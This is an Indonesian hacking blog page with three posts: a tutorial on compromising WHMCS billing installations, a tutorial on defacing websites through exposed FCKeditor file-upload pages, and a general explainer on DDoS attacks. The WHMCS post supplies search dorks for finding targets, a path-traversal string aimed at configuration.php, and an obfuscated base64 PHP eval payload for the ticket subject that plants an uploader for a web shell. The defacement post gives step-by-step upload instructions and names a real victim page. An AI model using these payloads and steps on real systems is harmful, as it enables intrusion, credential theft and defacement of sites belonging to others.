BloggerMates

FOLLOWERS

[ Categories ]

[ Followers ]

Image

[ Partner Link ]

[ Recent Comments ]

Arnoldi-Technology

[ Advertiser ]

Code HTML/Isi Widget kalian
Diberdayakan oleh Blogger.

Tutor HAck Whmcs



Sebelum kita Belajar udah pada tau belum Whmcs itu apa ?
WHMCS adalah suatu script yang sekarang paling dipakai oleh banyak kalangan webhoster
karena dengan memanage yang mudah.
WHMCS juga adalah sebuah billing yang berfungsi untuk pembuatan account hosting,
reseller,vps maupun dedicated.
WHMCS bisa dikatakan billing paling bagus untuk saat ini dan bisa dikatakan billing nomor 1
, WHMCS melebihi billing2 yang lain seperti ModernBill,AcountLab ++ dan lainnya.
Fitur WHMCS juga boleh dikatakan hampir komplit untuk urusan memanaged hosting, anda
akan di manjakan dengan BILLING WHMCS ini ..
Oke Kita Mulai Siapin Bahan Bahan nya :
1.Compi ( Tentu saja )
2.kopi ( biar gk ngantuk :v ) bisa juga di ganti dengan yang lain bila tidak suka kopi :D
3.Cemilan
4.terserah kalian mau nambahin apaan :D

Hack Whmcs Itu Ada 2 Cara :
1 . Dengan Metode Submitticet .
2 . Dengan Metode Exploit ..
Dork :1. inurl:whmcs/cart.php?a=

Dork Lengkap Untuk Teknik Submitticket:
  1. intext:Powered by WHMCompleteSolution
  2. inurl:submitticket.php intext:Powered by WHMCompleteSolution
  3. inurl:clients/submitticket.php intext:Powered by WHMCompleteSolution
  4. inurl:client/submitticket.php intext:Powered by WHMCompleteSolution
  5. inurl:clientsarea/submitticket.php intext:Powered by WHMCompleteSolution
  6. inurl:clientarea/submitticket.php intext:Powered by WHMCompleteSolution
  7. inurl:crm/submitticket.php intext:Powered by WHMCompleteSolution
  8. inurl:cp/submitticket.php intext:Powered by WHMCompleteSolution
  9. inurl:manage/submitticket.php intext:Powered by WHMCompleteSolution
  10. inurl:member/submitticket.php intext:Powered by WHMCompleteSolution
  11. inurl:members/submitticket.php intext:Powered by WHMCompleteSolution
  12. inurl:billing/submitticket.php intext:Powered by WHMCompleteSolution
  13. inurl:billings/submitticket.php intext:Powered by WHMCompleteSolution
  14. inurl:support/submitticket.php intext:Powered by WHMCompleteSolution
  15. inurl:help/submitticket.php intext:Powered by WHMCompleteSolution
  16. inurl:secure/submitticket.php intext:Powered by WHMCompleteSolution
  17. inurl:store/submitticket.php intext:Powered by WHMCompleteSolution
  18. inurl:whmcs/submitticket.php intext:Powered by WHMCompleteSolution
  19. inurl:log/submitticket.php intext:Powered by WHMCompleteSolution
  20. inurl:myaccount/submitticket.php intext:Powered by WHMCompleteSolution
  21. inurl:orders/submitticket.php intext:Powered by WHMCompleteSolution
  22. inurl:order/submitticket.php intext:Powered by WHMCompleteSolution
  23. inurl:portal/submitticket.php intext:Powered by WHMCompleteSolution
  24. inurl:mc/submitticket.php intext:Powered by WHMCompleteSolution
  25. inurl:office/submitticket.php intext:Powered by WHMCompleteSolution
  26. inurl:submitticket.php site:com intext:Powered by WHMCompleteSolution
  27. inurl:submitticket.php site:org intext:Powered by WHMCompleteSolution
  28. inurl:submitticket.php site:net intext:Powered by WHMCompleteSolution
  29. inurl:submitticket.php site:info intext:Powered by WHMCompleteSolution
  30. inurl:".*/*/submitticket.php" intext:Powered by WHMCompleteSolution
  31. inurl:".*/submitticket.php"  
Silahkan pilih salah satu dork tersebut , Jangan malas googling ya mas bro :D

 #Injector : cart.php?a=test&templatefile=../../../
configuration.php Kita Bahas HAck WHMCS Submittiket Dullu ya .. _Ini Exploit nya . Taro Di Subject ya .->{php}eval(base64_decode('JGM9YmFzZTY0X2RlY29kZSgiUEQ5d2FIQU5DbWxtS0dsemMyVjBLQ1JmVUU5VFZGc25VM1ZpYldsMEoxMHBLWHNOQ2lBZ0lDQWtabWxzWldScGNpQTlJQ0lpT3lBTkNpQWdJQ0FrYldGNFptbHNaU0E5SUNjeU1EQXdNREF3SnpzTkNnMEtJQ0FnSUNSMWMyVnlabWxzWlY5dVlXMWxJRDBnSkY5R1NVeEZVMXNuYVcxaFoyVW5YVnNuYm1GdFpTZGRPdzBLSUNBZ0lDUjFjMlZ5Wm1sc1pWOTBiWEFnUFNBa1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkMGJYQmZibUZ0WlNkZE93MEtJQ0FnSUdsbUlDaHBjM05sZENna1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkdVlXMWxKMTBwS1NCN0RRb2dJQ0FnSUNBZ0lDUmhZbTlrSUQwZ0pHWnBiR1ZrYVhJdUpIVnpaWEptYVd4bFgyNWhiV1U3RFFvZ0lDQWdJQ0FnSUVCdGIzWmxYM1Z3Ykc5aFpHVmtYMlpwYkdVb0pIVnpaWEptYVd4bFgzUnRjQ3dnSkdGaWIyUXBPdzBLSUNBTkNtVmphRzhpUEdObGJuUmxjajQ4WWo1RWIyNWxJRDA5UGlBa2RYTmxjbVpwYkdWZmJtRnRaVHd2WWo0OEwyTmxiblJsY2o0aU93MEtmUTBLZlEwS1pXeHpaWHNOQ21WamFHOG5EUW84Wm05eWJTQnRaWFJvYjJROUlsQlBVMVFpSUdGamRHbHZiajBpSWlCbGJtTjBlWEJsUFNKdGRXeDBhWEJoY25RdlptOXliUzFrWVhSaElqNDhhVzV3ZFhRZ2RIbHdaVDBpWm1sc1pTSWdibUZ0WlQwaWFXMWhaMlVpUGp4cGJuQjFkQ0IwZVhCbFBTSlRkV0p0YVhRaUlHNWhiV1U5SWxOMVltMXBkQ0lnZG1Gc2RXVTlJbE4xWW0xcGRDSStQQzltYjNKdFBpYzdEUXA5RFFvL1BpQT0iKTsNCiRmaWNoaWVyID0gZm9wZW4oJ2Rvd25sb2Fkcy9pbmRleHgucGhwJywndycpOw0KZndyaXRlKCRmaWNoaWVyLCAkYyk7DQpmY2xvc2UoJGZpY2hpZXIpOw=='));exit;{/php}

Oke sekarang Buka Google taruh Dork .
Yang Diatas Untk Teknik Submitticket Kalo Sudah Buka Web yg Terpilih
contoh:

Jika sudah masuk Liat SS nya lagi:

Nah kita sukses Buat / daftar Submitticket , Sekarang Tinggal buka deh .
contoh:
www.domain.co/whmcs/submitticket.php?step=2&deptid=1
Di ubah menjadi :
www.domaint.co/whmcs/downloads/indexx.php
Hasil jadi seperti ini 


Upload Dehh Shell Kalian . contoh : www.domain.co/whmcs/downloads/indexx.php Jadi : www.domain.co/whmcs/downloads/namashell.php 
SS:

sekian dulu ya , semoga bermanfaat sobat ^_^

Thanks to : Java defacer

Deface dengan Teknik Remote File Upload Exploit Vulnerability


Hay..sobat blogger kami Sidoarjo_Hacking Akan Share tentang Hacking :D
Ngga ada habis-habisnya kalo ngebahas soal hacking, Setiap hari berbagai macam exploit ditemukan. Dan sekarang saya akan share cara deface website lagi sob. Tutorial ini saya dapat dari grup facebook Hacker Indonesia. Namun karena masih banyak yang bingung, disini saya akan jelaskan beserta gambarnya.

http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html
We Are Anonymous !

Ok, daripada lama-lama cerita, mending kita langsung aja ketutorialnya sob, Berikut Tutorial Deface dengan Teknik Remote File Upload Exploit Vulnerability :

Dork :
inurl:/editor/editor/filemanager/
inurl:/HTMLEditor/editor/"

1). Masukan salah satu dork diatas ke Seacrh Enginee Google.

http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html

2). Pilih salah satu website sebagai target.

http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html

3). Tampilan Webitenya nanti akan seperti ini.

http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html

4). Kemudian kode ini :

editor/editor/filemanager/browser/mcpuk/images/icons/32/

5). Ganti dengan kode ini, Lalu enter :

editor/editor/filemanager/upload/test.html

http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html

6). Jika sudah, kamu ubah pada Select the "File Uploader" to use: Ubah dari ASP menjadi PHP.

7). Kemudian kamu klik Choose File, kamu pilih salah satu file HTML deface'an kamu.

http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html

8). Lalu klik Send it to the Server.

http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html

9). Jika berhasil nanti akan muncul notice jika file yang kamu upload berhasil tanpa eror, dan pada kotak ( Upload File URL ) akan memberikan patch dimana file kamu berada.

http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html

10). Copykan saja file yang ada di ( Upload File URL ) lalu taruh dibelakang site target, jadi nanti akan terlihat seperti ini :

http://www.tysk.ee/failid/Image/idulfitri(1).html

Screenshot :

http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html

Pengertian DDoS Attack



Apa itu Serangan DDoS Attack ?




Denial of Service (DDoSAttack upaya fatal dengan agen eksternal untuk menyebabkan situasi dimana sumber daya aktual (korban serangan menjalani) menjadi tidak tersedia untuk para pengunjung atau pengguna yang sebenarnya. Hal ini biasanya dilakukan dengan besar korban target dengan lalu lintas tidak sah dalam bentuk permintaan halaman yang rusak / tidak diminta akses.


Distributed Denial of Service (DDoS) serangan adalah bentuk muka DoS menyerang di mana agen didistribusikan melalui jaringan yang besar (atau internet)

Bagaimana Serangan DoS Attack dieksekusi?


Serangan DoS biasanya dijalankan dengan membanjiri server target dengan paket data yang tidak diminta dengan cara belum pernah terjadi sebelumnya. Hal ini dapat dilakukan oleh misconfiguring router jaringan atau dengan melakukan serangan smurf pada server korban. Hal ini menyebabkan 'Overflow Kapasitas', diikuti oleh Max Out sumber daya sistem, yang membuat layanan sasaran tidak tersedia, baik sementara atau permanen (Dalam hal perangkat keras yang ditargetkan Serangan DoS) untuk pengguna yang dituju.

Dalam kasus serangan DDoS, asal dari paket data yang tidak diminta (untuk tujuan banjir bandwidth / resource dari server korban) yang didistribusikan melalui jaringan yang besar (atau internet).

Mekanisme keseluruhan Serangan DDoS melibatkan sejumlah besar node jaringan dikompromikan (komputer yang terhubung ke internet), diatur oleh agen handler, yang selanjutnya dikendalikan secara terpusat oleh penyerang yang sebenarnya.

Jumlah besar komputer dikompromikan di internet kemudian sadar diatur oleh penyerang sumber untuk permintaan akses ke korban yang ditargetkan dalam rentang waktu minimal, yang selanjutnya menyebabkan saturasi sumber daya sistem yang terbatas dan hasil di shutdown akhirnya layanan yang ditargetkan.

Metode yang paling umum digunakan untuk kompromi jumlah besar agen pengguna di internet (untuk benar-benar mengeksekusi DDoS Attack) adalah dengan mengganggu komputer sebanyak mungkin melalui internet dengan malware / trojan, dimaksudkan untuk tujuan khusus.

Trojan tersebut dapat menyebar melalui lampiran email atau via Peer-to-peer jaringan. Apapun metode menyebar, setelah trojan yang dimaksud adalah diam-diam diinstal pada komputer agen kurang informasi, bahwa agen pengguna sebenarnya telah dikompromikan, yang kemudian disebut sebagai Zombie atau botnet.

Selanjutnya, itu menjadi hak prerogatif penyerang sumber untuk secara tidak langsung beberapa perintah atau semua Zombie nya agen (atau botnet) untuk menuntut akses ke layanan target.
Apa varian lain dari serangan DoS?

Ada banyak serangan lain yang serupa dan tujuan seperti serangan smurf, bom nuklir, ping kematian, serangan pisang, phlashing antara banyak lainnya.

Bagaimana mereka menetral dari serangan DDoS Attack?


Cara terbaik untuk mempertahankan layanan web dari goyah akibat serangan DDoS adalah untuk menjaga sumber daya cadangan dari sistem utuh. Sebagai tujuan serangan tersebut adalah untuk max keluar sumber daya sistem, jika sumber daya sistem yang sudah melimpah dan siap untuk menghadapi bahwa puncak tiba-tiba lalu lintas setiap saat, kemungkinan sebagian besar bahwa layanan web Anda akan bertahan DoS (atau bahkan DDoS) serangan .

Apa implikasi Serangan DDoS bisa miliki?


Jika serangan itu hanya terbatas untuk lalu lintas memakan besar dan sumber daya, implikasi terbatas tidak tersedianya layanan untuk beberapa jam (atau beberapa hari dalam kasus luar biasa). Hal ini tidak hanya menekankan administrator situs finansial tetapi juga mengakibatkan hilangnya reputasi pasar dan menempatkan tanda tanya pada keandalan layanan web.

Dalam kasus Serangan DoS hardware yang ditargetkan, dapat memperbesar kerugian keuangan untuk sebagian besar sebagai infrastruktur hosting yang harus diganti secara mendesak. Hal ini juga dapat menyebabkan hilangnya data penting, jika prosedubackuptidak sampai untuk menandai.


Sumber